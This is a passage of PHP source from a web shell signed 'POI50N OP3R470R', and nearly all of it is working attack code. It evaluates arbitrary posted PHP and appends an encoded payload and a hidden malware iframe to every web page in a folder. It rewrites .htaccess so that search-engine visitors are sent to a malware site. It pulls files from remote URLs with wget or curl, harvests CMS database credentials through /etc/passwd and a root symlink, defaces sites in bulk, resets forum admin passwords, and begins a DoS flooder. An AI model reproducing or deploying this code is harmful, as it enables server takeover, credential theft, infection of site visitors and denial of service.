3558 if(!mail($_POST['to'],$_POST['subject'].$subjectPadd,$_POST['message'].$messagePadd,"From:".$from))
3559 {
3560 $error = 1;
3561 echo "<center><font size=3><blink><blink>Some Error Occured!</blink></font></center>";
3562 break;
3563 }
3564 }
3565 if($error != 1)
3566 echo "<center><font class=txt size=3><blink>Mail(s) Sent!</blink></font></center>";
3567 }
3568 }
3569 else if($_POST['mailfunction'] == "massmailing")
3570 {
3571 if(isset($_POST['to']) && isset($_POST['from']) && isset($_POST['subject']) && isset($_POST['message']))
3572 {
3573 if(mail($_POST['to'],$_POST['subject'],$_POST['message'],"From:".$_POST['from']))
3574 echo "<center><font class=txt size=3><blink>Mail Sent!</blink></font></center>";
3575 else
3576 echo "<center><font size=3><blink>Some Error Occured!</blink></font></center>";
3577 }
3578 }
3579}
3580else if(isset($_POST['code']))
3581{
3582 if($_POST['code'] != null && isset($_POST['intext']) && $_POST['intext'] == "true")
3583 {
3584 // FIlter Some Chars we dont need
3585 ?><br>
3586 <textarea name="code" class="box" cols="120" rows="10"><?php
3587 $code = str_replace("<?php","",$_POST['code']);
3588 $code = str_replace("<?","",$code);
3589 $code = str_replace("?>","",$code);
3590
3591 // Evaluate PHP CoDE!
3592 htmlspecialchars(eval($code));
3593 ?>
3594 </textarea><?php
3595 }
3596 else if($_POST['code'] != null && $_POST['intext'] == "false")
3597 {
3598 $code = str_replace("<?php","",$_POST['code']);
3599 $code = str_replace("<?","",$code);
3600 $code = str_replace("?>","",$code);
3601
3602 // Evaluate PHP CoDE!
3603 ?><br><font size="4">Result of execution this PHP-code :</font><br><font class=txt><?php htmlspecialchars(eval($code)); ?></font><?php
3604 }
3605}
3606else if(isset($_GET['infect']))
3607{
3608 $mal_code="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";
3609 $coun = 0;
3610 foreach (glob($_GET['path'] . $directorysperator . "*.php") as $injectj00)
3611 {
3612 if($injectj00 == getcwd().$_SERVER['SCRIPT_NAME'])
3613 continue;
3614 if($myfile=fopen($injectj00,'a'))
3615 {
3616 fputs($myfile, gzuncompress(base64_decode($mal_code)));
3617 fclose($myfile);
3618 $coun = 1;
3619 }
3620 }
3621 foreach (glob($_GET['path'] . $directorysperator . "*.htm") as $injectj00)
3622 {
3623 if($myfile=fopen($injectj00,'a'))
3624 {
3625 fputs($myfile, gzuncompress(base64_decode($mal_code)));
3626 fclose($myfile);
3627 $coun = 1;
3628 }
3629 }
3630 foreach (glob($_GET['path'] . $directorysperator . "*.html") as $injectj00)
3631 {
3632 if($myfile=fopen($injectj00,'a'))
3633 {
3634 fputs($myfile, gzuncompress(base64_decode($mal_code)));
3635 fclose($myfile);
3636 $coun = 1;
3637 }
3638 }
3639 if($coun == 1)
3640 echo "<center>Done !!!!<center>";
3641 else
3642 echo "<center>Cannot open files !!!!<center>";
3643}
3644else if(isset($_GET['infectiframe']))
3645{
3646 $coun = 0;
3647 $str = "<iframe width=0px height=0px frameborder=no name=frame1 src=".$malsite."> </iframe>";
3648 foreach (glob($_GET['path'] . $directorysperator . "*.php") as $injectj00)
3649 {
3650 if($injectj00 == getcwd().$_SERVER['SCRIPT_NAME'])
3651 continue;
3652 if($myfile=fopen($injectj00,'a'))
3653 {
3654 fputs($myfile, $str);
3655 fclose($myfile);
3656 $coun = 1;
3657 }
3658 }
3659 foreach (glob($_GET['path'] . $directorysperator . "*.htm") as $injectj00)
3660 {
3661 if($myfile=fopen($injectj00,'a'))
3662 {
3663 fputs($myfile, $str);
3664 fclose($myfile);
3665 $coun = 1;
3666 }
3667 }
3668 foreach (glob($_GET['path'] . $directorysperator . "*.html") as $injectj00)
3669 {
3670 if($myfile=fopen($injectj00,'a'))
3671 {
3672 fputs($myfile, $str);
3673 fclose($myfile);
3674 $coun = 1;
3675 }
3676 }
3677
3678
3679 if($coun == 1)
3680 echo "<center>Done !!!!<center>";
3681 else
3682 echo "<center>Cannot open files !!!!<center>";
3683}
3684else if(isset($_GET['redirect']))
3685{
3686 if($myfile = fopen(".htaccess",'a'))
3687 {
3688 $mal = "# BEGIN WordPress
3689RewriteEngine On
3690RewriteOptions inherit
3691RewriteCond %{HTTP_REFERER} .*ask.com.*$ [NC,OR]
3692RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]
3693RewriteCond %{HTTP_REFERER} .*msn.com*$ [NC,OR]
3694RewriteCond %{HTTP_REFERER} .*bing.com*$ [NC,OR]
3695RewriteCond %{HTTP_REFERER} .*live.com*$ [NC,OR]
3696RewriteCond %{HTTP_REFERER} .*aol.com*$ [NC,OR]
3697RewriteCond %{HTTP_REFERER} .*altavista.com*$ [NC,OR]
3698RewriteCond %{HTTP_REFERER} .*excite.com*$ [NC,OR]
3699RewriteCond %{HTTP_REFERER} .*search.yahoo*$ [NC]
3700RewriteRule .* ".$malsite." [R,L]\n\r";
3701 fwrite($myfile, $mal);
3702 fclose($myfile);
3703 echo "<center>Done !!!!<center>";
3704 }
3705 else
3706 echo "<center>Cannot open file !!!!<center>";
3707}
3708else if(isset($_GET['malware']))
3709{ ?>
3710 <input type="hidden" id="malpath" value="<?php echo $_GET["dir"]; ?>">
3711 <center><table><tr><td><a href=# onClick="malwarefun('infect')"><font class=txt size="4">| Infect Users |</font></a></td>
3712 <td><a href=# onClick="malwarefun('infectiframe')"><font class=txt size="4">| Infect Users with Iframe |</font></a></td>
3713 <td><a href=javascript:void(0) onClick="malwarefun('redirect')"><font class=txt size="4">| Redirect Search Engine TO Malwared site |</font></a></td></tr></table></center>
3714 <div id="showmal"></div>
3715 <?php
3716}
3717else if(isset($_GET['codeinsert']))
3718{
3719 if($file1 = fopen(".htaccess",'r'))
3720 {
3721 ?><div id="showcode"></div>
3722 <form method=post>
3723 <textarea rows=9 cols=110 name="code" class=box><?php while(!feof($file1)) { echo fgets($file1); } ?></textarea><br>
3724 <input type="button" onClick="codeinsert(code.value)" value=" Insert " class=but>
3725 </form>
3726 <?php }
3727 else
3728 echo "<center>Cannot Open File!!</center>";
3729}
3730else if(isset($_POST['getcode']))
3731{
3732 if($myfile = fopen(".htaccess",'a'))
3733 {
3734 fwrite($myfile, $_POST['getcode']);
3735 fwrite($myfile, "\n\r");
3736 fclose($myfile);
3737 echo "<font class=txt>Code Inserted Successfully!!!!</font>";
3738 }
3739 else
3740 echo "Permission Denied";
3741}
3742else if(isset($_GET['uploadurl']))
3743{
3744 $functiontype = trim($_GET['functiontype']);
3745 $wurl = trim($_GET['wurl']);
3746 $path = magicboom($_GET['path']);
3747
3748 function remotedownload($cmd,$url)
3749 {
3750 $namafile = basename($url);
3751 switch($cmd)
3752 {
3753 case 'wwget':
3754 execmd(which('wget')." ".$url." -O ".$namafile);
3755 break;
3756 case 'wlynx':
3757 execmd(which('lynx')." -source ".$url." > ".$namafile);
3758 break;
3759 case 'wfread' :
3760 execmd($wurl,$namafile);
3761 break;
3762 case 'wfetch' :
3763 execmd(which('fetch')." -o ".$namafile." -p ".$url);
3764 break;
3765 case 'wlinks' :
3766 execmd(which('links')." -source ".$url." > ".$namafile);
3767 break;
3768 case 'wget' :
3769 execmd(which('GET')." ".$url." > ".$namafile);
3770 break;
3771 case 'wcurl' :
3772 execmd(which('curl')." ".$url." -o ".$namafile);
3773 break;
3774 default:
3775 break;
3776 }
3777 return $namafile;
3778 }
3779 $namafile = remotedownload($functiontype,$wurl);
3780 $fullpath = $path . $directorysperator . $namafile;
3781 if(is_file($fullpath))
3782 {
3783 echo "<center><font class=txt>File uploaded to $fullpath</font></center>";
3784 }
3785 else
3786 echo "<center>Failed to upload $namafile</center>";
3787}
3788else if(isset($_GET['createfolder']))
3789{
3790 if(!mkdir($_GET['createfolder']))
3791 echo '<BR>Failed To create<BR><input name="save" type="button" onClick="cancel()" value=" OK " id="spacing" class="but"/><BR><BR>';
3792 else
3793 echo '<BR><font class=txt>Folder Created Successfully</font><BR><input name="save" type="button" onClick="cancel()" value=" OK " id="spacing" class="but"/><BR><BR>';
3794}
3795else if(isset($_GET['selfkill']))
3796{
3797 if(unlink($curfile))
3798 echo "<br><center><font size=5>Good Bye......</font></center>";
3799 else
3800 echo "<br><center><font size=5>Shell cannot be removed......</font></center>";
3801}
3802else if(isset($_GET['Create']))
3803{
3804 ?><BR>
3805 <form method="post">
3806 <input type="hidden" name="filecreator" value="<?php echo $_GET['Create']; ?>">
3807 <textarea name="filecontent" rows="12" cols="100" class="box"></textarea><br />
3808 <input type="button" onClick="createfile(filecreator.value,filecontent.value)" value=" Save " class="but"/>
3809 <input name="save" type="button" onClick="cancel()" value="Cancel" id="spacing" class="but"/>
3810 </form>
3811
3812<?php }
3813else if(isset($_GET['readfile']))
3814{
3815 if(is_file($_GET['readfile']))
3816 {
3817 $owner = "0/0";
3818 if($os == "Linux")
3819 $owner = getOGid($_GET['readfile']);
3820 ?>
3821 <form>
3822 <table style="width:57%;">
3823 <tr align="left">
3824 <td align="left">File : </td><td><font class=txt><?php echo $_GET['readfile'];?></font></td><td align="left">Permissions : </td><td><a href=javascript:void(0) onClick="fileaction('perms','<?php echo addslashes($_GET['readfile']); ?>')"><?php echo filepermscolor($_GET['readfile']);?></a></td>
3825 </tr>
3826 <tr>
3827 <td>Size : </td><td><?php echo HumanReadableFileSize(filesize($_GET['readfile']));?></td><td>Owner/Group : </td><td><font class=txt><?php echo $owner;?></font></td>
3828 </tr>
3829 </table>
3830 <textarea name="content" rows="15" cols="100" class="box"><?php
3831 $content = htmlspecialchars(file_get_contents($_GET['readfile']));
3832 if($content)
3833 {
3834 echo $content;
3835 }
3836 else if(function_exists('fgets') && function_exists('fopen') && function_exists('feof'))
3837 {
3838 if(filesize($_GET['readfile']) != 0 )
3839 {
3840 fopen($_GET['readfile']);
3841 while(!feof())
3842 {
3843 echo htmlspecialchars(fgets($_GET['readfile']));
3844 }
3845 }
3846 }
3847
3848 ?>
3849 </textarea><br />
3850 <input name="save" type="button" onClick="savemyfile('<?php echo addslashes($_GET['readfile']); ?>',content.value)" value="Save Changes" id="spacing" class="but"/>
3851 <input type="button" onClick="cancel()" value="cancel" class="but" />
3852 </form>
3853 <?php
3854 }
3855 else
3856 echo '<BR><input name="save" type="button" onClick="cancel()" value=" OK " id="spacing" class="but"/><BR>File does not exist !!!!<BR>';
3857}
3858else if(isset($_POST['filecreator'])&&isset($_POST['filecontent']))
3859{
3860 $content = $_POST['filecontent'];
3861 if($file_pointer = fopen($_POST['filecreator'], "w+"))
3862 {
3863 fwrite($file_pointer, $content);
3864 fclose($file_pointer);
3865 echo "<font class=txt>File Created Successfully</font>";
3866 }
3867 else
3868 echo "Cannot Create File";
3869}
3870else if(isset($_REQUEST["massdeface"]))
3871{
3872?><center><table><tr><td><a href=# onClick="getmydefacedata('masswp')"><font class=txt size="4">| Wordpress |</font></a></td>
3873 <td><a href=# onClick="getmydefacedata('massjo')"><font class=txt size="4">| Joomla |</font></a></td>
3874 <td><a href=# onClick="getmydefacedata('massvb')"><font class=txt size="4">| Vbulletin |</font></a></td>
3875 </tr></table></center><br><div id="showmydeface"></div><?php
3876}
3877else if(isset($_REQUEST["masswp"]))
3878{
3879 ?><center><form method="post">
3880 <textarea id="massdef" cols=80 rows="19" class="box">POI50N OP3R470R WAS HERE !!!!! </textarea>
3881 <br><input type="button" onClick="massdeface('domasswp',massdef.value)" class="but" value=" Go "></form></center><br><div id="showdef"></div><?php
3882}
3883else if(isset($_REQUEST["massjo"]))
3884{
3885 ?><center><form method="post"><textarea id="massdef" cols=80 rows="20" class="box">POI50N OP3R470R WAS HERE !!!!!</textarea>
3886 <br><input type="button" onClick="massdeface('domassjo',massdef.value)" class="but" value=" Go "></form></center><br><div id="showdef"></div><?php
3887}
3888else if(isset($_REQUEST["massvb"]))
3889{
3890 ?><center><form method="post"><textarea id="massdef" cols=80 rows="20" class="box">POI50N OP3R470R WAS HERE !!!!!</textarea>
3891 <br><input type="button" onClick="massdeface('domassvb',massdef.value)" class="but" value=" Go "></form></center><br><div id="showdef"></div><?php
3892}
3893else if(isset($_REQUEST["massscript"]))
3894{
3895 if($os != "Windows")
3896 {
3897 $url = 'http://'.$_SERVER['SERVER_NAME'].$_SERVER['REQUEST_URI'];
3898 $path=explode('/',$url);
3899 $url =str_replace($path[count($path)-1],'',$url);
3900
3901 if($_REQUEST["massscript"] == "domasswp")
3902 {
3903 echo "<center><table border=1 style='width:70%;'><tr align=center><th>Site</th><th>Message</th><tr>";
3904 mkdir("dhanush");
3905 chdir("dhanush");
3906 execmd("ln -s / root");
3907 $file3 = 'Options all
3908 DirectoryIndex Sux.html
3909 AddType text/plain .php
3910 AddHandler server-parsed .php
3911 AddType text/plain .html
3912 AddHandler txt .html
3913 Require None
3914 Satisfy Any
3915 ';
3916 $fp3 = fopen('.htaccess','w');
3917 $fw3 = fwrite($fp3,$file3);
3918 @fclose($fp3);
3919 if(@file('/etc/passwd'))
3920 {
3921 $users = file('/etc/passwd');
3922 foreach($users as $user)
3923 {
3924 $user = explode(':', $user);
3925
3926 $conf = @file_get_contents($url."dhanush/root/home/".$user[0]."/public_html/wp-config.php");
3927 if(entre2v2($conf,"define('DB_USER', '","');"))
3928 changeindexwp($conf,$_REQUEST['massdef']);
3929 }
3930 }
3931 else
3932 {
3933 $temp = "";
3934 $val1 = 0;
3935 $val2 = 1000;
3936 for(;$val1 <= $val2;$val1++)
3937 {
3938 $uid = @posix_getpwuid($val1);
3939 if ($uid)
3940 $temp .= join(':',$uid)."\n";
3941 }
3942
3943 $temp = trim($temp);
3944
3945 if($file5 = fopen("test.txt","w"))
3946 {
3947 fputs($file5,$temp);
3948 fclose($file5);
3949
3950 $file = fopen("test.txt", "r");
3951 while(!feof($file))
3952 {
3953 $s = fgets($file);
3954 $matches = array();
3955 $t = preg_match('/\/(.*?)\:\//s', $s, $matches);
3956 $matches = str_replace("home/","",$matches[1]);
3957 if(strlen($matches) > 12 || strlen($matches) == 0 || $matches == "bin" || $matches == "etc/X11/fs" || $matches == "var/lib/nfs" || $matches == "var/arpwatch" || $matches == "var/gopher" || $matches == "sbin" || $matches == "var/adm" || $matches == "usr/games" || $matches == "var/ftp" || $matches == "etc/ntp" || $matches == "var/www" || $matches == "var/named")
3958 continue;
3959 $conf = @file_get_contents($url."dhanush/root/home/".$matches."/public_html/wp-config.php");
3960 if(entre2v2($conf,"define('DB_USER', '","');"))
3961 changeindexwp($conf,$_REQUEST['massdef']);
3962 }
3963 fclose($file);
3964 }
3965 }
3966 }
3967 elseif($_REQUEST["massscript"] == "domassjo")
3968 {
3969 mkdir("dhanush");
3970 chdir("dhanush");
3971 $d0mains = @file("/etc/named.conf");
3972 if($d0mains)
3973 {
3974 $defcount = 0;
3975 echo "<center><table border=1 style='width:80%;'><tr align=center><th>Login new info</th><th>Login info</th><th>Site</th><th>Message</th><tr>";
3976 foreach($d0mains as $d0main)
3977 {
3978 if(eregi("zone",$d0main))
3979 {
3980 preg_match_all('#zone "(.*)"#', $d0main, $domains);
3981 flush();
3982
3983 if(strlen(trim($domains[1][0])) > 2)
3984 {
3985 $user = posix_getpwuid(@fileowner("/etc/valiases/".$domains[1][0]));
3986 $conf = @file_get_contents($url."dhanush/root/home/".$user['name']."/public_html/configuration.php");
3987 if(entre2v2($conf,$dol."user = '","';"))
3988 changeindexjo($conf,$_REQUEST['massdef'],$domains[1][0]);
3989 }
3990 }
3991 }
3992 echo '</table><br><h3>'.$defcount.' sites defaced</h3>';
3993 }
3994 else
3995 echo "Cannot Read /etc/named.conf";
3996 }
3997 elseif($_REQUEST["massscript"] == "domassvb")
3998 {
3999 mkdir("dhanush");
4000 chdir("dhanush");
4001 echo "<center><table border=1 style='width:70%;'><tr align=center><th>Site</th><th>Message</th><tr>";
4002
4003 if(@file('/etc/passwd'))
4004 {
4005 $users = file('/etc/passwd');
4006 foreach($users as $user)
4007 {
4008 $user = explode(':', $user);
4009 $conf = @file_get_contents($url."dhanush/root/home/".$user['0']."/public_html/includes/config.php");
4010 if(entre2v2($conf,"['MasterServer']['username'] = '","';"))
4011 changeindexvb($conf,$_REQUEST['massdef']);
4012 $conf = @file_get_contents($url."dhanush/root/home/".$user['0']."/public_html/vb/configuration.php");
4013 if(entre2v2($conf,"['MasterServer']['username'] = '","';"))
4014 changeindexvb($conf,$_REQUEST['massdef']);
4015 $conf = @file_get_contents($url."dhanush/root/home/".$user['0']."/public_html/forum/configuration.php");
4016 if(entre2v2($conf,"['MasterServer']['username'] = '","';"))
4017 changeindexvb($conf,$_REQUEST['massdef']);
4018 $conf = @file_get_contents($url."dhanush/root/home/".$user['0']."/public_html/core/configuration.php");
4019 if(entre2v2($conf,"['MasterServer']['username'] = '","';"))
4020 changeindexvb($conf,$_REQUEST['massdef']);
4021 $conf = @file_get_contents($url."dhanush/root/home/".$user['0']."/public_html/vb/core/configuration.php");
4022 if(entre2v2($conf,"['MasterServer']['username'] = '","';"))
4023 changeindexvb($conf,$_REQUEST['massdef']);
4024 }
4025 }
4026 else
4027 {
4028 $temp = "";
4029 $val1 = 0;
4030 $val2 = 1000;
4031 for(;$val1 <= $val2;$val1++)
4032 {
4033 $uid = @posix_getpwuid($val1);
4034 if ($uid)
4035 $temp .= join(':',$uid)."\n";
4036 }
4037
4038 $temp = trim($temp);
4039
4040 if($file5 = fopen("test.txt","w"))
4041 {
4042 fputs($file5,$temp);
4043 fclose($file5);
4044
4045 $file = fopen("test.txt", "r");
4046 while(!feof($file))
4047 {
4048 $s = fgets($file);
4049 $matches = array();
4050 $t = preg_match('/\/(.*?)\:\//s', $s, $matches);
4051 $matches = str_replace("home/","",$matches[1]);
4052 if(strlen($matches) > 12 || strlen($matches) == 0 || $matches == "bin" || $matches == "etc/X11/fs" || $matches == "var/lib/nfs" || $matches == "var/arpwatch" || $matches == "var/gopher" || $matches == "sbin" || $matches == "var/adm" || $matches == "usr/games" || $matches == "var/ftp" || $matches == "etc/ntp" || $matches == "var/www" || $matches == "var/named")
4053 continue;
4054 $conf = @file_get_contents($url."dhanush/root/home/".$matches."/public_html/includes/config.php");
4055 if(entre2v2($conf,"['MasterServer']['username'] = '","';"))
4056 changeindexvb($conf,$_REQUEST['massdef']);
4057 $conf = @file_get_contents($url."dhanush/root/home/".$matches."/public_html/vb/configuration.php");
4058 if(entre2v2($conf,"['MasterServer']['username'] = '","';"))
4059 changeindexvb($conf,$_REQUEST['massdef']);
4060 $conf = @file_get_contents($url."dhanush/root/home/".$matches."/public_html/forum/configuration.php");
4061 if(entre2v2($conf,"['MasterServer']['username'] = '","';"))
4062 changeindexvb($conf,$_REQUEST['massdef']);
4063 $conf = @file_get_contents($url."dhanush/root/home/".$matches."/public_html/core/configuration.php");
4064 if(entre2v2($conf,"['MasterServer']['username'] = '","';"))
4065 changeindexvb($conf,$_REQUEST['massdef']);
4066 $conf = @file_get_contents($url."dhanush/root/home/".$matches."/public_html/vb/core/configuration.php");
4067 if(entre2v2($conf,"['MasterServer']['username'] = '","';"))
4068 changeindexvb($conf,$_REQUEST['massdef']);
4069 changeindexvb($conf,$_REQUEST['massdef']);
4070 }
4071 fclose($file);
4072 }
4073 }
4074 }
4075 echo "</table><center>";
4076 }
4077 else
4078 echo "<center>Cannot do mass deface</center>";
4079}
4080else if(isset($_REQUEST["defaceforum"]))
4081{
4082 ?>
4083 <center><div id="showdeface"></div>
4084 <font size="4">Forum Index Changer</font>
4085 <form action="<?php echo $self; ?>" method = "POST">
4086 <input type="hidden" name="forum">
4087 <input type="hidden" name="defaceforum">
4088 <table class=btmtbl border = "1" width="60%" style="text-align: center;" align="center">
4089 <tr>
4090 <td height="50" width="50%"> Host : <input class="sbox" type="text" name="f1" size="20" value="localhost"></td>
4091
4092 <td width="50%"> Database : <input type ="text" class="sbox" name = "f2" size="20"></td></tr>
4093 <tr><td height="50" width="50%">User : <input type ="text" class="sbox" name = "f3" size="20"> </td>
4094 <td> Password : <input class="sbox" type ="text" name = "f4" size="20"></td></tr>
4095
4096 <tr><td height="50" width="50%">Type :
4097 <select class=sbox id="forumdeface" name="forumdeface" onChange="checkforum(this.value)">
4098 <option value="vb">vbulletin</option>
4099 <option value="mybb">Mybb</option>
4100 <option value="smf">SMF</option>
4101 <option value="ipb">IPB</option>
4102 <option value="wp">Wordpress</option>
4103 <option value="joomla">Joomla</option>
4104 </select></td>
4105 <td height="50" width="50%">Prefix : <input type="text" id="tableprefix" name="tableprefix" class="sbox"></td></td>
4106
4107 </tr>
4108 <tr>
4109 <td height="167" width="50%" colspan=2>
4110 <div style="display:none;" id="myjoomla"><p><b>Site URL : </b><input class="box" type="text" id="siteurl" name="siteurl" width="80" value="http://site.com/administrator/"></p></div>
4111
4112 <div style="display:none;" id="smfipb"><p align="center"><b>Head : </b><input class="sbox" type="text" name="head" size="20" value="Hacked"> <b>Kate ID : </b><input class="sbox" type="text" name="f5" size="20" value="1">
4113
4114 </div>
4115
4116 <p align="center"> <textarea class="box" name="index" cols=53 rows=8><b>lol ! POI50N OP3R470R WAS HERE !!!!! !!!!</b></textarea><p align="center">
4117 <input type="button" onClick="forumdefacefn(index.value,f1.value,f2.value,f3.value,f4.value,forumdeface.value,tableprefix.value,siteurl.value,head.value,f5.value)" class="but" value = "Hack It">
4118 </td>
4119 </tr>
4120 </table>
4121 </form>
4122 </center>
4123 <?php
4124 }
4125 else if(isset($_GET["passwordchange"]))
4126 {
4127 echo "<center>";
4128 ?>
4129 <div id="showchangepass"></div>
4130 <font size="4">Forum Password Changer</font>
4131 <form onSubmit="changeforumpassword('forumpass',f1.value,f2.value,f3.value,f4.value,forums.value,tableprefix.value,ipbuid.value,newipbpass.value,username.value,newjoomlapass.value,uname.value,newpass.value);return false;">
4132 <table class=btmtbl border = "1" width="60%" height="246" style="text-align: center;" align="center">
4133 <tr>
4134 <td height="50" width="50%"> Host : <input class="sbox" type="text" name="f1" size="20" value="localhost"></td><td height="50" width="50"> DataBase : <input type ="text" class="sbox" name = "f2" size="20"></td> <tr><td height="50" width="50%"> User : <input type ="text" class="sbox" name = "f3" size="20"></td><td height="50" width="50%"> Password : <input class="sbox" type ="text" name = "f4" size="20"></td></tr>
4135 <tr>
4136 <td height="50" width="50%">Type :
4137 <select class=sbox id="forums" name="forums" onChange="showMsg(this.value)">
4138 <option value="vb">vbulletin</option>
4139 <option value="mybb">Mybb</option>
4140 <option value="smf">SMF</option>
4141 <option value="ipb">IPB</option>
4142 <option value="phpbb">PHPBB</option>
4143 <option value="wp">Wordpress</option>
4144 <option value="joomla">Joomla</option>
4145 </select></td>
4146 <td height="50" width="50%">Prefix : <input type="text" id="tableprefix" name="tableprefix" class="sbox"></td>
4147 </tr>
4148 <tr>
4149 <td colspan=2 height="100" width="780">
4150
4151 <p align="center"><div id="fid" style="display:block;">User ID : <input class="sbox" type="text" name="ipbuid" size="20" value="1"> New Password : <input type ="text" class="sbox" name = "newipbpass" size="20" value="hacked"></div>
4152
4153 <div id="joomla" style="display:none;">New Username : <input style="width:170px;" class="box" type="text" name="username" size="20" value="admin"> New Password : <input type ="text" class="sbox" name = "newjoomlapass" size="20" value="hacked"></div>
4154
4155 <div id="wpress" style="display:none;"><p>New Username : <input style="width:170px;" class="box" type="text" name="uname" size="20" value="admin"> New Password : <input type ="text" class="sbox" name = "newpass" size="20" value="hacked"></p></div>
4156
4157 <p><input type = "button" onClick="changeforumpassword('forumpass',f1.value,f2.value,f3.value,f4.value,forums.value,tableprefix.value,ipbuid.value,newipbpass.value,username.value,newjoomlapass.value,uname.value,newpass.value)" class="but" value = " Change IT " name="forumpass"></p></td>
4158 </tr>
4159 </table>
4160 </form>
4161 </center>
4162 <?php
4163}
4164else if(isset($_GET['dosser']))
4165{
4166 if(isset($_GET['ip']) && isset($_GET['exTime']) && isset($_GET['port']) && isset($_GET['timeout']) && isset($_GET['exTime']) && $_GET['exTime'] != "" &&
4167 $_GET['port'] != "" && $_GET['ip'] != "" && $_GET['timeout'] != "" && $_GET['exTime'] != "" )
4168 {
4169 $IP=$_GET['ip'];
4170 $port=$_GET['port'];
4171 $executionTime = $_GET['exTime'];
4172 $no0fBytes = $_GET['no0fBytes'];
4173 $data = "";
4174 $timeout = $_GET['timeout'];
4175 $packets = 0;
